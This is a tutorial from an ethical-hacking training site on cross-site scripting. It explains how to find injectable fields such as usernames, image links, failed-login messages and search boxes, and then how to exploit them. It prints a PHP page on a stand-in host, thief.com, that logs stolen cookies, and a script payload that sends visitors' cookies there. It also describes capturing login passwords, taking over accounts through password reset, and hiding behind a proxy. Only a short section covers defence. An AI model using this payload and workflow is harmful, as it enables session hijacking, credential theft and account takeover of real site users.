Extreme Hacking
Advanced Ethical Hacking Institute in Pune
Cross-site scripting attacks (CSS-XSS)
Note 1: This tut requires only basic knowledge of HTML, javascript and
php.
Note 2: Of course which language you will use to exploit the
vulnerability
on your “thief” site is your choice… I use php…
1.Introduction
2.Finding vulnerabilities
3.Exploiting vulnerabilities
4.Protecting your site
—-1.Introduction—-
CSS attacks are the easiest attacks one can use to attack a site. When
you attack
a site this way you manage to install a script on it and have it run
every time a
user or guest visits the site or gets his mouse over a link or clicks
it and so on.
After getting the script installed at the site it’s all easy after
that.
—-2.Finding vulnerabilities—-
As i have mentioned above the hard part is to find the vulnerable spot
on the site.
Most CSS tutorials start with something like … “having a vulnerable
guestbook…”
I mean what is the point of having users if you have a guestbook that
allows HTML
code. So our aproach is going to be a little different and definitely
not with a
guestbook.
The only way to insert something in the website is if the website
allows you to insert
it. This means that you have to find a form that needs you to insert
content. No…
are you kidding??? Ok i know that you all got that by now. So it is
logical that you
don’t only want to insert content on the site but you also want your
content
displayed. Well that means that you have to find a form that displays
the inserted
content. The most common form is … a guestbook or a forum. But guess
what… they
are (almost) always protected. So you have to find something else.
Common things that
are displayed in web pages are:
a. —Usernames—
Usually protected but not always…
b. —User’s web pages (displayed on other’s sites)—
The links that allow you to write a name for the link might be
vulnerable.
c. —Image displays—
That one is quite good… It is the place where a site allows you to
write
a link for your picture. Sometimes it is not protected. So all you
have to
do is write your image close the <img> tag and then write your script.
d. —Failed logins—
I almost forgot those
Example: “No user ‘asadh’ found” What would happen if you wrote
<script>……..</script> for a username??
Nice cause you can get the pass straight away but rare really rare.
e. —Search engines—
Example: “No entries found for ‘asdas'” likewise What would happen if
you
wrote <script>……..</script> for an entry??
Ok, enough with those. Now the most important thing is to be able to
examine a site
and find its CSS vulnerability or determine that it has none.
This means that finding a vulnerability depends on the capability of
the “attacker”.
—-3.Exploiting vulnerabilities—-
Ok now we have a vulnerable site and we can install any script we want.
What do we install??
A “hello” alert box? No. We send the user to a site of our own which
can be on any free
server that does the dirty work for us…
Now what can we get from our exploit depends on the place of it on the
site and the structure of
the site.
Supposing our site is http://www.thief.com/steal.php.
And we have found a vulnerability to another site on any place of the
site. We want to log in as another
user, all we need is this user’s cookie whether this is ‘Session’ or
‘pass’ or ‘user’. So here is
our simple php code that most of you who know any server-side scripting
language have already thought.
<?php
//Conect to database
$con = mysql_connect(servername,username,password);
mysql_select_db(“my_db”, $con);
//Insert cookie values at database
mysql_query(“INSERT INTO table_name (cookieuser,…)
VALUES (‘”.$_GET[‘cuser’].”‘,….)”);
//Go back where we were
echo ‘<script>document.location = “the other site”</script>’;
?>
Ok now it’s easy to think of the script that we need to be executed.
<script>document.location=”www.thief.com/steal.php?cuser=”+document.cookie</script>
Good now we are logged in as another user do as you like. But does that
really help us? Yes if all we wanted
was to login this site as somebody else but what i would do would be go
to the user’s profile change his e-mail
adress to mine and hit the “Forgot your password” link that exists in
most sites. And there you go the site has
e-mailed you with the password.
But there is also a possibility that you can get the pass straight
away. If the vulnerability is in the
log in form. Then well you can add a onsubmit=”…..” and execute the
script only this time instead of
document.cookie send as a parameter to your page the
document.forms[0].user.value and
document.forms[0].password.value. And you got what you need.
Also here like in finding the vulnerabilities don’t forget to improvise
test and try things depending on
what you want to achieve.
—-4.Protecting your site—-
Ok that’s the easiest thing of all. But only if you code your own
stuff… You must either use the predefined
functions of each language that strip the HTML tags everywhere or
replace those symbols < , > with those < ,
> each time you display something (that comes from a user) on your
site. If you use other people’s stuff
just check them before you upload them to your site. Well i really
think that i should omit
this part because everyone who knows how to attack a site knows how to
protect it from this attack.
Concluding i should note to everyone that finding those vulnerabilities
you must not use them but inform the
owner of the site so that he can correct them. Also forgot to tell you
that you should use some proxy when
you try these things out cause not revealing your IP is always better.
www.extremehacking.org
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE,Certified Ethical Hacking, Center For Advanced Security Training in India,IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune